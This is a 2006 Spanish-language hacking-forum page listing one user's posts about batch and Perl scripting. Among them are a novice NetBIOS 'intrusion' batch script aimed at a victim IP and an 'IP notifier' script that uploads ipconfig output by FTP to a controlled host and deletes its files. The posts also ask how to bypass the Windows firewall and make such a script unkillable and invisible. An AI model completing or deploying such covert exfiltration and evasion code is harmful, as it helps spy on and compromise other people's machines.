elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Mensajes
Páginas: [1]
1  Programación / Scripting / Re: perl o python??? en: 28 Julio 2006, 09:00 am
Sinceramente, python no lo conozco en su totalidad pero perl es bastante bueno... Estoi aprendiendo a programar con el, y como es un lenguaje interpretado , es superfacil y yo porlomenos no he tenido ninguna limitacion a la hora de hacer alguna utilidad... Eso claro, quizas ahora tu necesites un lenguaje para diversas cosas... eso deberias leerlo en las webs oficiales.
2  Programación / Scripting / Re: Dudas en BATCH en: 28 Julio 2006, 08:57 am
Claro que puedes modificar cualquier registro....

Cuantas veces no habremos visto las típicas
Código:
ADD_Key

Bajate un manual de BAT bastante amplio que ahí te explicara funcion por funcion en español y perfectamente... Si encuentro algun link te lo cuelgo que ahora tengo un poquillo de prisa ;)

Nos vemos , ciao
3  Programación / Scripting / Re: Notificador de IP en BATCH ( Totalmente didáctico ) en: 28 Julio 2006, 08:55 am
cierto!!! Que buena idea!! :P

Me parece que con tu permiso jejejeje voi a hacer el Notificator v1.2 :P

Te guardaré una linilla de comentario al final del programa
Agradecimientos: A SirDarckCat por prestarme su cerebro :D
4  Programación / Scripting / Re: Codigo batch en: 28 Julio 2006, 08:04 am
Saludos, estoy empezando a aprender a programar en bat y se me ocurrio hacer de prueba un programa un poco ''lammer'' que introdujese todos los comandos para una intrusion por NetBIOS, el codigo que he hecho es este:
Citar
@echo off


color 0A

cls
title Intrusion por NetBIOS by Larskot
echo ******************************
echo *    Intrusion por NetBIOS   *
echo ******************************
echo.
echo Pulsa una tecla para continuar
pause > nul
cls

echo Escribe la IP de la victima
set /P miu=


nbtstat -A %miu%
cls

nbtstat –R
cls

net view \\%miu%
cls
La duda es: como consigo mandarle que abra Documentos compartidos??, es decir se podria hacer con el comando
Citar
DIR \\(nombre_del_pc)
asi que como le indico el nombre para que lo tome como una variable??

Saludos

Pregunta De novato : Con ese nbtstat -A si no me equivoco lo que consigues es la tabla de netBIOS de la maquina a la que pusiste la ip... Luego liberas con el -A ... y no se si esque soi 1 poco tonto o esque me estoi quedando pillao o no entiendo un carajo pero ... ¿ Que se consigue con eso ?

Cnt please me hariais un favor :D
5  Programación / Scripting / Notificador de IP en BATCH ( Totalmente didáctico ) en: 28 Julio 2006, 07:28 am
Hola a to2 chicos, estoi aprendiendo batch y se me ocurrió hacer un notificador de ip ... Es algo que lo he hecho mas que nada para empezar con el lenguaje, vamos que no es una herramienta especializada para hack, si no un simple programa con poca funcionabilidad ya que como ahora vereis, tras un router no tiene funcionabilidad :D

Código:

@echo off
set fichtemp=%temp%/ip.txt
set ftp=ftp.txt
goto notificador
:notificador
ipconfig > %fichtemp%
rem #Hasta aqui tenemos su ip, obtenida mediante ipconfig#
rem #y la hemos estampado en un txt. Ahora iniciaremos#
rem #una sesion ftp para subir este archivo con esos#
rem #datos a una maquina ftp bajo nuestro poder.#
echo Comandos para FTP, Linea 1 >> %ftp%
echo Comandos para FTP, Linea 2 >> %ftp%
echo Comandos para FTP, Linea 3 >> %ftp%
echo Bye >> %ftp%
rem #Para subir ese archivo por ftp necesitamos abrir#
rem #una sesion de ftp e introducir comandos de ftp#
rem #que estan en ftp.txt, 1 comando por cada linea#
rem # ( Comandos de ftp incompletos... )#
goto ftp
:ftp
ftp -s:ftp.txt XXX.XXX.XXX.XXX
del %fichtemp%
del %ftp%
exit

Como vereis el programa es totalmente didáctico, tiene poco o ningun uso ( para notificar la ip teneis el excelente Kotilla v1.0 )....

Ahora, ( mas que nada para aprender) me gustaria perfeccionar el programa en :
-Conseguir los comandos de FTP apropiados para :
::Abrir sesion
::Subir archivo
::Cerrar sesion
-Agregar una llave al registro, para saltarse el firewall de windows. ( No es muy dificil )
-Capacitar el programa de inmunidad: Es decir, que no pueda ser cerrado de ningun modo mientras se ejecuta... FTP es lento y mientras sube el archivo y demas se veria claramente. A poder ser tambien seria excepcional hacer su ejecucción invisible ( no se si eso es posible ).
------------------------------------------------------------------------
Antes de nada, agradezco a todo programador que me heche una mano ya que todas estas cosas las pido no para perfeccionar el programa , si no para aprender a hacerlo y saber hacerlo por mi mismo en un futuro :D...

Ciao y gracias a to2 de antemano :D
6  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Los números de elhacker.net en: 27 Junio 2006, 23:46 pm
... y por cierto es hilarante que digas "haber" y pidas a alguien que guarde silencio por no saber ...

OWNED!!
7  Informática / Tutoriales - Documentación / Re: Tutorial de Inyección SQL en: 20 Junio 2006, 17:29 pm
Hola... entiendo la inyeccion mas o menos sin ningun problema... El problema es cuando subo el archivo hackme.php a un servidor ( con php habilitado claro ) y no me lo arranca bien... Ademas estan configuradas las variables "dbhost" "dbuser" y "dbpass" la de "dbdata" no se lo que es ¿ una manita ? thx
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines